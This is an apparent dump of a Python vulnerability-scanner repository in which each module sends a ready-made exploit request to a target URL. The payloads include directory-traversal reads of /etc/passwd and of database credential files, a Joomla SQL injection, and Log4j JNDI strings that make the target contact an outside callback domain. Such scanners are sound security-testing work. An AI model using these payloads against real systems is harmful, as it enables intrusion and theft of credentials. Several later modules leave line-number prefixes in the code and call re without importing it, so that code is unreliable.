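        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/modules/vulnerabilities/other/keycloak-xss.py:
--------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    """Static metadata for the Keycloak client-registration XSS check."""
    return {
        "author": "cckuailong",
        "name": "Keycloak <= 8.0 - Cross Site Scripting",
        "description": "",
        "severity": "info",
        "references": [
            "https://cure53.de/pentest-report_keycloak.pdf"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["keycloak", "xss"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """POST a JSON object with an empty key to the client-registration endpoint.

    A hit is HTTP 400 whose body starts the `Unrecognized field "` parse error,
    i.e. the endpoint echoes unknown field names back. That is a behaviour
    fingerprint, not a demonstration of script execution, which is why the
    severity is "info".

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        path = "/auth/realms/master/clients-registrations/openid-connect"
        data = {"": 1}
        headers = {'Content-Type': 'application/json'}
        resp0 = requests.post(url + path, json=data, headers=headers, timeout=10, verify=False, allow_redirects=False)
        # The original literal was `"""Unrecognized field """"` - an unterminated
        # string, so the module failed to import at all. The marker presumably
        # intended is the start of the error text including its opening quote.
        if resp0.status_code == 400 and 'Unrecognized field "' in resp0.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """No separate exploit stage: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/modules/cves/2014/CVE-2014-5258.py:
--------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    """Static metadata for the webEdition showTempFile.php traversal check (CVE-2014-5258)."""
    return {
        "author": "cckuailong",
        "name": "webEdition 6.3.8.0 - Directory Traversal",
        "description": "A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.",
        "severity": "high",
        "references": [
            "https://nvd.nist.gov/vuln/detail/CVE-2014-5258",
            "https://www.exploit-db.com/exploits/34761"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2014-5258",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2014", "lfi"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Traverse to /etc/passwd through showTempFile.php's `file` parameter.

    The description above says the flaw needs an authenticated user, but this
    probe sends no credentials, so a vulnerable host that enforces login
    produces no hit (false negative rather than false positive).

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        path = "/webEdition/showTempFile.php?file=../../../../etc/passwd"
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """The file read is the whole demonstration: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/modules/cves/2015/CVE-2015-9480.py:
--------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    """Static metadata for the WordPress RobotCPA f.php traversal check (CVE-2015-9480)."""
    return {
        "author": "cckuailong",
        "name": "WordPress Plugin RobotCPA 5 - Directory Traversal",
        "description": "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.",
        "severity": "high",
        "references": [
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480",
            "https://www.exploit-db.com/exploits/37252"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "cvss-score": "7.5",
            "cve-id": "CVE-2015-9480",
            "cwe-id": "CWE-22"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Pass base64("file:///etc/passwd") as the `l` parameter of the plugin's f.php.

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        # ZmlsZTovLy9ldGMvcGFzc3dk is base64("file:///etc/passwd").
        path = "/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """The file read is the whole demonstration: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------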
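/modules/cves/2018/CVE-2018-18778.py:
--------------------------------------------------------------------------------
import re

import requests


# Vuln Base Info
def info():
    """Static metadata for the ACME mini_httpd arbitrary file read check (CVE-2018-18778)."""
    return {
        "author": "cckuailong",
        "name": "mini_httpd Path Traversal",
        "description": "ACME mini_httpd before 1.30 lets remote users read arbitrary files.",
        "severity": "medium",
        "references": [
            "https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "cvss-score": "",
            "cve-id": "CVE-2018-18778",
            "cwe-id": "CWE-200"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2018", "lfi"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Request the absolute path /etc/passwd and look for the root entry.

    A hit requires HTTP 200 and a line matching `root:.*:0:0:` (uid 0, gid 0).

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        path = "/etc/passwd"
        resp0 = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        # `re` was used here without being imported; under the old bare except
        # the NameError was swallowed and the check always reported failure.
        if resp0.status_code == 200 and re.search(r"root:.*:0:0:", resp0.text):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        # Transport errors only; other exceptions now surface instead of being
        # swallowed by a bare except.
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """The file read is the whole demonstration: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/modules/cves/2022/CVE-2022-25323.py:
--------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    """Static metadata for the ZEROF Web Server /admin.back XSS check (CVE-2022-25323)."""
    return {
        "author": "cckuailong",
        "name": "ZEROF Web Server 2.0 Cross-Site Scripting",
        "description": "ZEROF Web Server 2.0 allows /admin.back cross-site scripting.",
        "severity": "medium",
        "references": [
            "https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md",
            "https://nvd.nist.gov/vuln/detail/CVE-2022-25323"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "cvss-score": "6.1",
            "cve-id": "CVE-2022-25323",
            "cwe-id": "CWE-79"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["xss", "cve", "cve2022", "zerof"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Request /admin.back and report a hit on HTTP 401 with "back" in the body.

    This only confirms the endpoint exists and echoes part of the path; no
    script payload is sent, so a hit is an indicator for manual follow-up
    rather than proof of reflection.

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        path = "/admin.back"
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 401 and "back" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """No separate exploit stage: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/modules/vulnerabilities/apache/apache-ofbiz-log4j-rce.py:
--------------------------------------------------------------------------------
import requests
from plugins.oob import verify_request, gen_oob_domain



# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Apache OFBiz Log4j JNDI RCE''',
        "description": '''''',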
12 | "severity": "critical", 13 | "references": [ 14 | "" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["ofbiz", "oast", "log4j", "rce", "apache", "jndi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/webtools/control/main""" 43 | method = "GET" 44 | data = """""" 45 | headers = {'Cookie': 'OFBiz.Visitor=${jndi:ldap://${hostName}.%s}' % oob_domain} 46 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 47 | 48 | if verify_request(type="dns", flag=flag): 49 | result["success"] = True 50 | result["info"] = info() 51 | result["payload"] = url+path 52 | 53 | except: 54 | result["success"] = False 55 | 56 | return result 57 | 58 | 59 | # Exploit, can be same with poc() 60 | def exp(url): 61 | return poc(url) 62 | 63 | 64 | # Utils 65 | def format_url(url): 66 | url = url.strip() 67 | if not ( url.startswith('http://') or url.startswith('https://') ): 68 | url = 'http://' + url 69 | url = url.rstrip('/') 70 | 71 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/openvpn-hhi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''OpenVPN Host Header Injection''', 9 | "description": '''A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field.''', 10 | "severity": "info", 11 | "references": [ 12 | "" 13 | ], 14 | "classification": { 15 | 
"cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["openvpn", "hostheader-injection"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/""" 39 | method = "GET" 40 | data = """""" 41 | headers = {} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""//{{randstr}}.tld/__session_start__/""" in str(resp0.headers) and """openvpn_sess""" in str(resp0.headers)) and (resp0.status_code == 302): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/vmware/vmware-vcenter-lfi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''VMware vCenter Unauthenticated Arbitrary File Read''', 9 | "description": '''''', 10 | "severity": "high", 11 | "references": [ 12 | "https://kb.vmware.com/s/article/7960893", 13 | "https://twitter.com/ptswarm/status/1316016337550938122" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": 
["vmware", "lfi", "vcenter"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/eam/vib?id={{path}}\\vcdb.properties""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (re.search(r"""(?m)^(driver|dbtype|password(\.encrypted)?)\s=""",resp0.text)) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/oa-tongda-path-traversal.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''OA TongDa Path Traversal''', 9 | "description": '''''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://github.com/jas502n/OA-tongda-RCE" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["tongda", "lfi"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = 
"""/ispirit/interface/gateway.php""" 39 | method = "POST" 40 | data = """json={"url":"/general/../../mysql5/my.ini"}""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""text/html""" in str(resp0.headers)) and ("""[mysql]""" in resp0.text and """password=""" in resp0.text) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-1000012.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)''', 9 | "description": '''Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin''', 10 | "severity": "high", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985", 13 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "7.5", 18 | "cve-id": "CVE-2015-1000012", 19 | "cwe-id": "CWE-200" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def 
fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/processmaker-lfi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ProcessMaker <= 3.5.4 Directory Traversal''', 9 | "description": '''A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/50229", 13 | "https://www.processmaker.com" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["processmaker", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/../../../..//etc/passwd""" 40 | method = "GET" 41 | data = """""" 42 | headers = 
{} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-7297.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Joomla Core SQL Injection''', 9 | "description": '''A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2015-7297", 13 | "http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2015-7297", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "joomla", "sqli"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)' 39 | 40 | resp = 
requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if "cf79ae6addba60ad018347359bd144d2" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-7780.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ManageEngine Firewall Analyzer 8.0 - Directory Traversal''', 9 | "description": '''Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/35933", 13 | "https://www.cvedetails.com/cve/CVE-2015-7780/" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "6.5", 18 | "cve-id": "CVE-2015-7780", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "lfi", "manageengine"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/fw/mindex.do?url=./WEB-INF/web.xml%3f' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "java.sun.com" in resp.text and "application/xml" in 
str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-5688.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Geddy before v13.0.8 LFI''', 9 | "description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nodesecurity.io/advisories/geddy-directory-traversal", 13 | "https://github.com/geddy/geddy/issues/697" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "geddy", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = 
url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-7823.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | 5 | # Vuln Base Info 6 | def info(): 7 | return { 8 | "author": "cckuailong", 9 | "name": '''Kentico CMS 8.2 Open Redirection''', 10 | "description": '''The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability''', 11 | "severity": "low", 12 | "references": [ 13 | "https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2015-7823" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2015", "kentico", "redirect"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/CMSPages/GetDocLink.ashx?link=https://example.com/' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and re.search(r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$', str(resp.headers)): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # 
Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/jamf/jamf-log4j-jndi-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''JAMF Log4j JNDI RCE''', 11 | "description": '''''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://github.com/random-robbie/jamf-log4j" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["rce", "jndi", "log4j", "jamf"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/""" 43 | method = "POST" 44 | data = """username=${jndi:ldap://${hostName}.%s/test}&password=""" % oob_domain 45 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 46 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 47 | 48 | if verify_request(type="dns", flag=flag): 49 | result["success"] = True 50 | result["info"] = info() 51 | result["payload"] = url+path 52 | 53 | except: 54 | result["success"] = False 55 | 56 | return result 57 | 58 | 59 | # Exploit, can be same with poc() 60 | def exp(url): 61 | return poc(url) 62 | 63 | 64 | # Utils 65 | def format_url(url): 66 | 
